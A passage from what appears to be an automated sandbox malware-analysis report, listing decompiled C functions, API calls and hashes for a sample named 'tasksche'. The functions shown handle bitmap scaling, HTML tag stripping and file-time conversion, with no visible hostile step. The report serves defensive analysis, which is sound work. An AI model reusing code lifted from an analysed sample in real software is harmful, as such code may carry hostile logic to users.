                                                                                              								if( *((intOrPtr*)( *_t111 + 0x1c))() < 0) {
                                                                                              									DeleteObject(_a12);
                                                                                              								} else {
                                                                                              									_v20 = _a12;
                                                                                              								}
                                                                                              								_t114 = _a8;
                                                                                              								 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                              							}
                                                                                              							_t101 = _v12;
                                                                                              							 *((intOrPtr*)( *_t101 + 8))(_t101);
                                                                                              							_t103 = _v16;
                                                                                              							 *((intOrPtr*)( *_t103 + 8))(_t103);
                                                                                              							_t105 = _v8;
                                                                                              							 *((intOrPtr*)( *_t105 + 8))(_t105);
                                                                                              							_t78 = _v20;
                                                                                              							if(_t78 != 0) {
                                                                                              								L18:
                                                                                              								return _t78;
                                                                                              							} else {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              						}
                                                                                              						_t117 = _v16;
                                                                                              						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                                                              						goto L9;
                                                                                              					}
                                                                                              				}
                                                                                              				return E00419D0B(_a4, _a8, _a12);
                                                                                              			}














































                                                                                              0x00419ea0
                                                                                              0x00419ead
                                                                                              0x00419ecd
                                                                                              0x00419ed6
                                                                                              0x00419edc
                                                                                              0x00419edd
                                                                                              0x00419ee0
                                                                                              0x00419ee5
                                                                                              0x00419ee7
                                                                                              0x00419ee7
                                                                                              0x00419eea
                                                                                              0x00419efd
                                                                                              0x00419f05
                                                                                              0x0041a056
                                                                                              0x0041a056
                                                                                              0x00000000
                                                                                              0x00419f0b
                                                                                              0x00419f0b
                                                                                              0x00419f1b
                                                                                              0x00419f20
                                                                                              0x00419f23
                                                                                              0x00419f6a
                                                                                              0x00419f6d
                                                                                              0x00000000
                                                                                              0x00419f6d
                                                                                              0x00419f28
                                                                                              0x00419f29
                                                                                              0x00419f2e
                                                                                              0x00419f34
                                                                                              0x00419f5e
                                                                                              0x00419f5e
                                                                                              0x00419f64
                                                                                              0x00419f67
                                                                                              0x00000000
                                                                                              0x00419f67
                                                                                              0x00419f36
                                                                                              0x00419f39
                                                                                              0x00419f3b
                                                                                              0x00419f3d
                                                                                              0x00419f3e
                                                                                              0x00419f3f
                                                                                              0x00419f40
                                                                                              0x00419f43
                                                                                              0x00419f44
                                                                                              0x00419f45
                                                                                              0x00419f4a
                                                                                              0x00419f4d
                                                                                              0x00419f53
                                                                                              0x00419f7c
                                                                                              0x00419f88
                                                                                              0x00419f90
                                                                                              0x00419f94
                                                                                              0x00419f97
                                                                                              0x00419fa5
                                                                                              0x00419fac
                                                                                              0x00419faf
                                                                                              0x00419fb2
                                                                                              0x00419fb5
                                                                                              0x00419fbb
                                                                                              0x00419fc0
                                                                                              0x00419fcc
                                                                                              0x00419fce
                                                                                              0x00419fd8
                                                                                              0x00419fdb
                                                                                              0x00419fe8
                                                                                              0x00419feb
                                                                                              0x00419fee
                                                                                              0x00419ff9
                                                                                              0x00419fff
                                                                                              0x0041a003
                                                                                              0x0041a004
                                                                                              0x0041a007
                                                                                              0x0041a00a
                                                                                              0x0041a00d
                                                                                              0x0041a012
                                                                                              0x0041a018
                                                                                              0x0041a025
                                                                                              0x0041a01a
                                                                                              0x0041a01d
                                                                                              0x0041a01d
                                                                                              0x0041a02b
                                                                                              0x0041a031
                                                                                              0x0041a031
                                                                                              0x0041a034
                                                                                              0x0041a03a
                                                                                              0x0041a03d
                                                                                              0x0041a043
                                                                                              0x0041a046
                                                                                              0x0041a04c
                                                                                              0x0041a04f
                                                                                              0x0041a054
                                                                                              0x0041a059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041a054
                                                                                              0x00419f55
                                                                                              0x00419f5b
                                                                                              0x00000000
                                                                                              0x00419f5b
                                                                                              0x00419f05
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 00419E75: GetDC.USER32(00000000), ref: 00419E79
                                                                                                • Part of subcall function 00419E75: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00419E84
                                                                                                • Part of subcall function 00419E75: ReleaseDC.USER32 ref: 00419E8F
                                                                                              • GetObjectW.GDI32(00000200,00000018,?,00000000,7490BB20), ref: 00419ECD
                                                                                              • CoCreateInstance.OLE32(0042B208,00000000,00000001,0042B100,?,00000000,?), ref: 00419EFD
                                                                                                • Part of subcall function 00419D0B: GetDC.USER32(00000000), ref: 00419D17
                                                                                                • Part of subcall function 00419D0B: CreateCompatibleDC.GDI32(00000000), ref: 00419D27
                                                                                                • Part of subcall function 00419D0B: CreateCompatibleDC.GDI32(?), ref: 00419D2E
                                                                                                • Part of subcall function 00419D0B: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,00419EBD,00000200,?,?), ref: 00419D3C
                                                                                                • Part of subcall function 00419D0B: CreateCompatibleBitmap.GDI32(?,00000200,00419EBD), ref: 00419D5E
                                                                                                • Part of subcall function 00419D0B: SelectObject.GDI32(00000000,?), ref: 00419D71
                                                                                                • Part of subcall function 00419D0B: SelectObject.GDI32(?,00000200), ref: 00419D7C
                                                                                                • Part of subcall function 00419D0B: StretchBlt.GDI32(?,00000000,00000000,00000200,00419EBD,00000000,00000000,00000000,?,?,00CC0020), ref: 00419D9A
                                                                                                • Part of subcall function 00419D0B: SelectObject.GDI32(00000000,?), ref: 00419DA4
                                                                                                • Part of subcall function 00419D0B: SelectObject.GDI32(?,00419EBD), ref: 00419DAC
                                                                                                • Part of subcall function 00419D0B: DeleteDC.GDI32(00000000), ref: 00419DB5
                                                                                                • Part of subcall function 00419D0B: DeleteDC.GDI32(?), ref: 00419DBA
                                                                                                • Part of subcall function 00419D0B: ReleaseDC.USER32 ref: 00419DC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateSelect$Compatible$DeleteRelease$BitmapCapsDeviceInstanceStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 189428636-3887548279
                                                                                              • Opcode ID: 2c95d850f981d7af9c5ed3b9bf4fae1c522e7595f6c5569b0b0a1ef1f992ee39
                                                                                              • Instruction ID: d8cf3f11634150c5eb1370622c6fe0712570af28e2ae67cdae83cea958a68594
                                                                                              • Opcode Fuzzy Hash: 2c95d850f981d7af9c5ed3b9bf4fae1c522e7595f6c5569b0b0a1ef1f992ee39
                                                                                              • Instruction Fuzzy Hash: 21610875A00209EFCB00DFA5D888EEEBBB9FF89704B10845AF815EB250D7759E51CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E0041947D(void* __ebx, void* __ecx, void* __eflags, signed short* _a4, signed short* _a7) {
                                                                                              				signed short* _v8;
                                                                                              				void* __edi;
                                                                                              				signed short* _t18;
                                                                                              				signed short* _t19;
                                                                                              				signed int _t20;
                                                                                              				signed int _t21;
                                                                                              				signed short _t22;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              				signed int _t26;
                                                                                              				void* _t27;
                                                                                              				signed int _t29;
                                                                                              				signed short* _t30;
                                                                                              				void* _t34;
                                                                                              				signed short* _t35;
                                                                                              				short _t41;
                                                                                              				signed int _t42;
                                                                                              				signed short _t43;
                                                                                              				short _t44;
                                                                                              				void* _t45;
                                                                                              				signed short* _t46;
                                                                                              				void* _t49;
                                                                                              				signed short* _t51;
                                                                                              				short* _t52;
                                                                                              				short* _t54;
                                                                                              				signed short* _t56;
                                                                                              				signed short* _t69;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t56 = _a4;
                                                                                              				_t49 = __ecx;
                                                                                              				_t18 = E0041CF3E(__ebx, _t45, _t49, E0041A7AF(_t56) + _t16 + 2);
                                                                                              				_v8 = _t18;
                                                                                              				if(_t18 == 0) {
                                                                                              					L44:
                                                                                              					return _t18;
                                                                                              				}
                                                                                              				_t19 = E004191A2(_t56);
                                                                                              				_t51 = _v8;
                                                                                              				_a7 = _t19;
                                                                                              				_t20 =  *_t56 & 0x0000ffff;
                                                                                              				if(_t20 == 0) {
                                                                                              					L43:
                                                                                              					_t18 = _v8;
                                                                                              					goto L44;
                                                                                              				}
                                                                                              				_push(__ebx);
                                                                                              				while(1) {
                                                                                              					_t65 = _t20;
                                                                                              					if(_t20 != 0) {
                                                                                              						goto L3;
                                                                                              					}
                                                                                              					L26:
                                                                                              					_t21 = E00411E81(_t65, _t56, L"</p>", 4);
                                                                                              					asm("sbb bl, bl");
                                                                                              					_t34 =  ~_t21 + 1;
                                                                                              					_t66 = _t34;
                                                                                              					if(_t34 != 0 || E00411E81(_t66, _t56, L"<br>", 4) == 0) {
                                                                                              						_t22 = 0xd;
                                                                                              						 *_t51 = _t22;
                                                                                              						_t23 = 2;
                                                                                              						_t52 = _t51 + _t23;
                                                                                              						_t41 = 0xa;
                                                                                              						 *_t52 = _t41;
                                                                                              						_t51 = _t52 + _t23;
                                                                                              						if(_t34 != 0) {
                                                                                              							_t43 = 0xd;
                                                                                              							 *_t51 = _t43;
                                                                                              							_t54 = _t51 + _t23;
                                                                                              							_t44 = 0xa;
                                                                                              							 *_t54 = _t44;
                                                                                              							_t51 = _t54 + _t23;
                                                                                              							_t69 = _t51;
                                                                                              						}
                                                                                              					}
                                                                                              					 *_t51 = 0;
                                                                                              					_t25 = E00411E81(_t69, _t56, L"<style>", 7);
                                                                                              					if(_t25 != 0) {
                                                                                              						while(1) {
                                                                                              							_t26 =  *_t56 & 0x0000ffff;
                                                                                              							__eflags = _t26;
                                                                                              							if(_t26 == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							__eflags = _t26 - 0x3e;
                                                                                              							if(_t26 == 0x3e) {
                                                                                              								L40:
                                                                                              								_t56 =  &(_t56[1]);
                                                                                              								__eflags = _t56;
                                                                                              								goto L41;
                                                                                              							}
                                                                                              							_t56 =  &(_t56[1]);
                                                                                              							__eflags = _t56;
                                                                                              						}
                                                                                              						__eflags =  *_t56 - 0x3e;
                                                                                              						if( *_t56 != 0x3e) {
                                                                                              							goto L41;
                                                                                              						}
                                                                                              						goto L40;
                                                                                              					} else {
                                                                                              						_t71 =  *_t56 - _t25;
                                                                                              						if( *_t56 == _t25) {
                                                                                              							L42:
                                                                                              							goto L43;
                                                                                              						} else {
                                                                                              							goto L32;
                                                                                              						}
                                                                                              						while(1) {
                                                                                              							L32:
                                                                                              							_t27 = E00411E81(_t71, _t56, L"</style>", 8);
                                                                                              							_t56 =  &(_t56[1]);
                                                                                              							if(_t27 == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							if( *_t56 != 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							L41:
                                                                                              							_t20 =  *_t56 & 0x0000ffff;
                                                                                              							if(_t20 != 0) {
                                                                                              								goto L3;
                                                                                              							}
                                                                                              							goto L42;
                                                                                              						}
                                                                                              						_t56 =  &(_t56[7]);
                                                                                              						goto L41;
                                                                                              					}
                                                                                              					L3:
                                                                                              					__eflags = _t20 - 0x3c;
                                                                                              					if(__eflags == 0) {
                                                                                              						goto L26;
                                                                                              					}
                                                                                              					__eflags = _a7;
                                                                                              					if(_a7 == 0) {
                                                                                              						L10:
                                                                                              						_t35 = 0;
                                                                                              						__eflags = _a7;
                                                                                              						if(_a7 == 0) {
                                                                                              							L18:
                                                                                              							_t29 =  *_t56 & 0x0000ffff;
                                                                                              							__eflags = _t29;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L26;
                                                                                              							}
                                                                                              							__eflags = _t29 - 0x20;
                                                                                              							if(_t29 != 0x20) {
                                                                                              								L22:
                                                                                              								 *_t51 = _t29;
                                                                                              								_t51 =  &(_t51[1]);
                                                                                              								__eflags = _t51;
                                                                                              								L23:
                                                                                              								_t56 =  &(_t56[1]);
                                                                                              								__eflags = _t56;
                                                                                              								L24:
                                                                                              								_t20 =  *_t56 & 0x0000ffff;
                                                                                              								continue;
                                                                                              							}
                                                                                              							__eflags = _t51 - _v8;
                                                                                              							if(_t51 == _v8) {
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							__eflags =  *((intOrPtr*)(_t51 - 2)) - _t29;
                                                                                              							if( *((intOrPtr*)(_t51 - 2)) == _t29) {
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						__eflags = _t20 - 0x26;
                                                                                              						if(_t20 != 0x26) {
                                                                                              							goto L18;
                                                                                              						}
                                                                                              						_t46 = 0;
                                                                                              						__eflags = 0;
                                                                                              						do {
                                                                                              							_t30 = _t46 + _t56;
                                                                                              							_t42 =  *_t30 & 0x0000ffff;
                                                                                              							__eflags = _t42;
                                                                                              							if(_t42 == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							__eflags = _t42 - 0x3b;
                                                                                              							if(_t42 == 0x3b) {
                                                                                              								_t12 =  &(_t30[1]); // 0x2
                                                                                              								_t56 = _t12;
                                                                                              								_t35 = 1;
                                                                                              							}
                                                                                              							_t46 = _t46 + 2;
                                                                                              							__eflags = _t46 - 0x28;
                                                                                              						} while (_t46 < 0x28);
                                                                                              						__eflags = _t35;
                                                                                              						if(__eflags != 0) {
                                                                                              							goto L24;
                                                                                              						}
                                                                                              						goto L18;
                                                                                              					}
                                                                                              					__eflags = _t20 - 0xd;
                                                                                              					if(_t20 == 0xd) {
                                                                                              						L7:
                                                                                              						__eflags = _t51 - _v8;
                                                                                              						if(_t51 == _v8) {
                                                                                              							L9:
                                                                                              							_t29 = 0x20;
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						__eflags =  *((short*)(_t51 - 2)) - 0x20;
                                                                                              						if( *((short*)(_t51 - 2)) == 0x20) {
                                                                                              							goto L23;
                                                                                              						}
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					__eflags = _t20 - 0xa;
                                                                                              					if(_t20 != 0xa) {
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}






























                                                                                              0x00419480
                                                                                              0x00419482
                                                                                              0x00419487
                                                                                              0x00419493
                                                                                              0x0041949a
                                                                                              0x0041949f
                                                                                              0x004195f9
                                                                                              0x004195fc
                                                                                              0x004195fc
                                                                                              0x004194a8
                                                                                              0x004194ad
                                                                                              0x004194b0
                                                                                              0x004194b3
                                                                                              0x004194b9
                                                                                              0x004195f6
                                                                                              0x004195f6
                                                                                              0x00000000
                                                                                              0x004195f6
                                                                                              0x004194bf
                                                                                              0x0041953e
                                                                                              0x0041953e
                                                                                              0x00419541
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419547
                                                                                              0x0041954f
                                                                                              0x00419558
                                                                                              0x0041955a
                                                                                              0x0041955a
                                                                                              0x0041955c
                                                                                              0x00419571
                                                                                              0x00419572
                                                                                              0x00419577
                                                                                              0x00419578
                                                                                              0x0041957c
                                                                                              0x0041957d
                                                                                              0x00419580
                                                                                              0x00419584
                                                                                              0x00419588
                                                                                              0x00419589
                                                                                              0x0041958e
                                                                                              0x00419590
                                                                                              0x00419591
                                                                                              0x00419594
                                                                                              0x00419594
                                                                                              0x00419594
                                                                                              0x00419584
                                                                                              0x004195a0
                                                                                              0x004195a3
                                                                                              0x004195aa
                                                                                              0x004195d9
                                                                                              0x004195d9
                                                                                              0x004195dc
                                                                                              0x004195df
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004195d1
                                                                                              0x004195d5
                                                                                              0x004195e7
                                                                                              0x004195e8
                                                                                              0x004195e8
                                                                                              0x00000000
                                                                                              0x004195e8
                                                                                              0x004195d8
                                                                                              0x004195d8
                                                                                              0x004195d8
                                                                                              0x004195e1
                                                                                              0x004195e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004195ac
                                                                                              0x004195ac
                                                                                              0x004195af
                                                                                              0x004195f5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004195b1
                                                                                              0x004195b1
                                                                                              0x004195b9
                                                                                              0x004195bf
                                                                                              0x004195c2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004195c8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004195e9
                                                                                              0x004195e9
                                                                                              0x004195ef
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004195ef
                                                                                              0x004195cc
                                                                                              0x00000000
                                                                                              0x004195cc
                                                                                              0x004194c2
                                                                                              0x004194c2
                                                                                              0x004194c6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004194c8
                                                                                              0x004194cc
                                                                                              0x004194eb
                                                                                              0x004194eb
                                                                                              0x004194ed
                                                                                              0x004194f0
                                                                                              0x0041951b
                                                                                              0x0041951b
                                                                                              0x0041951e
                                                                                              0x00419521
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419523
                                                                                              0x00419527
                                                                                              0x00419534
                                                                                              0x00419534
                                                                                              0x00419538
                                                                                              0x00419538
                                                                                              0x00419539
                                                                                              0x0041953a
                                                                                              0x0041953a
                                                                                              0x0041953b
                                                                                              0x0041953b
                                                                                              0x00000000
                                                                                              0x0041953b
                                                                                              0x00419529
                                                                                              0x0041952c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041952e
                                                                                              0x00419532
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419532
                                                                                              0x004194f2
                                                                                              0x004194f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004194f8
                                                                                              0x004194f8
                                                                                              0x004194fa
                                                                                              0x004194fa
                                                                                              0x004194fd
                                                                                              0x00419500
                                                                                              0x00419503
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419505
                                                                                              0x00419509
                                                                                              0x0041950b
                                                                                              0x0041950b
                                                                                              0x0041950e
                                                                                              0x0041950e
                                                                                              0x00419511
                                                                                              0x00419512
                                                                                              0x00419512
                                                                                              0x00419517
                                                                                              0x00419519
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419519
                                                                                              0x004194ce
                                                                                              0x004194d2
                                                                                              0x004194da
                                                                                              0x004194da
                                                                                              0x004194dd
                                                                                              0x004194e6
                                                                                              0x004194e8
                                                                                              0x00000000
                                                                                              0x004194e8
                                                                                              0x004194df
                                                                                              0x004194e4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004194e4
                                                                                              0x004194d4
                                                                                              0x004194d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004194d8

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00419489
                                                                                              • _malloc.LIBCMT ref: 00419493
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_malloc_wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>
                                                                                              • API String ID: 4208083856-1200123991
                                                                                              • Opcode ID: 84057df06bfe7753af8be449b5ed96cf61f8b1a65555f0712547b90151fa4e6f
                                                                                              • Instruction ID: 25e48dc46573b9320602deb0b34776bf62bfe2b29788b043e296d39cf0375d11
                                                                                              • Opcode Fuzzy Hash: 84057df06bfe7753af8be449b5ed96cf61f8b1a65555f0712547b90151fa4e6f
                                                                                              • Instruction Fuzzy Hash: 69412477645212B5DB315B1998217FA73A69F01754F68401BED81B32C0E76C8EC2C26D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E004113F1(long* __ecx, signed int* _a4) {
                                                                                              				struct _FILETIME _v12;
                                                                                              				struct _FILETIME _v20;
                                                                                              				void* _v24;
                                                                                              				struct _FILETIME _v28;
                                                                                              				void* _v32;
                                                                                              				struct _FILETIME _v36;
                                                                                              				struct _SYSTEMTIME _v52;
                                                                                              				struct _SYSTEMTIME _v68;
                                                                                              				struct _SYSTEMTIME _v84;
                                                                                              				void* _t71;
                                                                                              				signed int _t81;
                                                                                              				void* _t84;
                                                                                              				signed int _t113;
                                                                                              				long _t115;
                                                                                              				signed int* _t126;
                                                                                              
                                                                                              				_v20.dwLowDateTime =  *__ecx;
                                                                                              				_v20.dwHighDateTime = __ecx[1];
                                                                                              				if(E00409C06() >= 0x600) {
                                                                                              					FileTimeToSystemTime( &_v20,  &_v68);
                                                                                              					SystemTimeToTzSpecificLocalTime(0,  &_v68,  &_v84);
                                                                                              					SystemTimeToFileTime( &_v84,  &_v12);
                                                                                              					SystemTimeToFileTime( &_v68,  &_v28);
                                                                                              					_t115 = _v20.dwHighDateTime;
                                                                                              					asm("adc ecx, ebx");
                                                                                              					_t71 = E0041ABD0(_v12.dwHighDateTime + _t115, 0, 0, 1);
                                                                                              					asm("sbb edx, ebx");
                                                                                              					asm("sbb edx, ebx");
                                                                                              					asm("adc edx, ebx");
                                                                                              					asm("adc edx, ebx");
                                                                                              					_v12.dwLowDateTime = _t71 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
                                                                                              					_v12.dwHighDateTime = _t115;
                                                                                              				} else {
                                                                                              					FileTimeToLocalFileTime( &_v20,  &_v12);
                                                                                              				}
                                                                                              				FileTimeToSystemTime( &_v12,  &_v52);
                                                                                              				_t126 = _a4;
                                                                                              				_t81 = _v52.wDay & 0x0000ffff;
                                                                                              				_t113 = _v52.wMonth & 0x0000ffff;
                                                                                              				_t116 = _v52.wYear & 0x0000ffff;
                                                                                              				_t126[3] = _v52.wHour & 0x0000ffff;
                                                                                              				_t126[2] = _t81;
                                                                                              				_t126[4] = _v52.wMinute & 0x0000ffff;
                                                                                              				_t126[8] = _t81 - 1;
                                                                                              				_t126[5] = _v52.wSecond & 0x0000ffff;
                                                                                              				_t84 = 1;
                                                                                              				 *_t126 = _v52.wYear & 0x0000ffff;
                                                                                              				_t126[1] = _t113;
                                                                                              				_t126[7] = _v52.wDayOfWeek & 0x0000ffff;
                                                                                              				if(_t113 > 1) {
                                                                                              					_a4 = 0x430138;
                                                                                              					while(_t84 <= 0xc) {
                                                                                              						_t126[8] = _t126[8] +  *_a4;
                                                                                              						_a4 =  &(_a4[1]);
                                                                                              						_t84 = _t84 + 1;
                                                                                              						if(_t84 < _t113) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						goto L7;
                                                                                              					}
                                                                                              				}
                                                                                              				L7:
                                                                                              				if(_t113 > 2 && E004113C2(_t116) != 0) {
                                                                                              					_t126[8] = _t126[8] + 1;
                                                                                              				}
                                                                                              				_v52.wMilliseconds = 0;
                                                                                              				SystemTimeToFileTime( &_v52,  &_v36);
                                                                                              				_t126[6] = 0 - _v36.dwLowDateTime + _v12.dwLowDateTime;
                                                                                              				return _v12.dwHighDateTime;
                                                                                              			}


















                                                                                              0x004113ff
                                                                                              0x00411402
                                                                                              0x0041141b
                                                                                              0x00411435
                                                                                              0x00411441
                                                                                              0x0041144f
                                                                                              0x00411459
                                                                                              0x0041145b
                                                                                              0x0041146a
                                                                                              0x0041146e
                                                                                              0x0041147d
                                                                                              0x00411486
                                                                                              0x0041148d
                                                                                              0x00411491
                                                                                              0x00411493
                                                                                              0x0041149b
                                                                                              0x0041141d
                                                                                              0x00411425
                                                                                              0x00411425
                                                                                              0x004114a6
                                                                                              0x004114a8
                                                                                              0x004114af
                                                                                              0x004114b3
                                                                                              0x004114b7
                                                                                              0x004114bb
                                                                                              0x004114c2
                                                                                              0x004114c5
                                                                                              0x004114cd
                                                                                              0x004114d2
                                                                                              0x004114d9
                                                                                              0x004114da
                                                                                              0x004114dc
                                                                                              0x004114df
                                                                                              0x004114e4
                                                                                              0x004114e6
                                                                                              0x004114ed
                                                                                              0x004114f7
                                                                                              0x004114fa
                                                                                              0x004114fe
                                                                                              0x00411501
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00411501
                                                                                              0x004114ed
                                                                                              0x00411503
                                                                                              0x00411506
                                                                                              0x00411512
                                                                                              0x00411512
                                                                                              0x00411517
                                                                                              0x00411523
                                                                                              0x00411538
                                                                                              0x0041153e

                                                                                              APIs
                                                                                                • Part of subcall function 00409C06: GetVersionExW.KERNEL32(?), ref: 00409C2B
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 00411425
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00411435
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00411441
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041144F
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411459
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000000,00000001), ref: 004114A6
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411523
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: b334752188d409053c41308d043ef773f1ba1375d33674074c65fffa3be1e0d1
                                                                                              • Instruction ID: 2321c29e0176793db35fe244bdb3b2ca835dfa759224b44d16608c614d02fbda
                                                                                              • Opcode Fuzzy Hash: b334752188d409053c41308d043ef773f1ba1375d33674074c65fffa3be1e0d1
                                                                                              • Instruction Fuzzy Hash: 40410AB1E00218AFCB14DFA9C8849EEB7F9FF48314B14852FE946E7240D778A945CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D92D(intOrPtr* __edi, void* __eflags) {
                                                                                              				char _v5;
                                                                                              				char _v8200;
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t18;
                                                                                              				short* _t28;
                                                                                              				void* _t31;
                                                                                              				signed int _t32;
                                                                                              				void* _t39;
                                                                                              				intOrPtr* _t41;
                                                                                              				short* _t42;
                                                                                              				void* _t43;
                                                                                              
                                                                                              				_t41 = __edi;
                                                                                              				E0041AAF0(0x2004);
                                                                                              				_t42 = E0041CF3E(_t31, _t39, __edi, 0x20000);
                                                                                              				if(_t42 == 0) {
                                                                                              					E004063CE(0x4335ac);
                                                                                              				}
                                                                                              				 *_t42 = 0;
                                                                                              				_t32 = 0;
                                                                                              				while(1) {
                                                                                              					_t18 = E0040D781(0,  &_v8200, _t42,  *_t41, 0,  &_v5, 0x1000);
                                                                                              					 *_t41 = _t18;
                                                                                              					if(_t18 == 0) {
                                                                                              						break;
                                                                                              					}
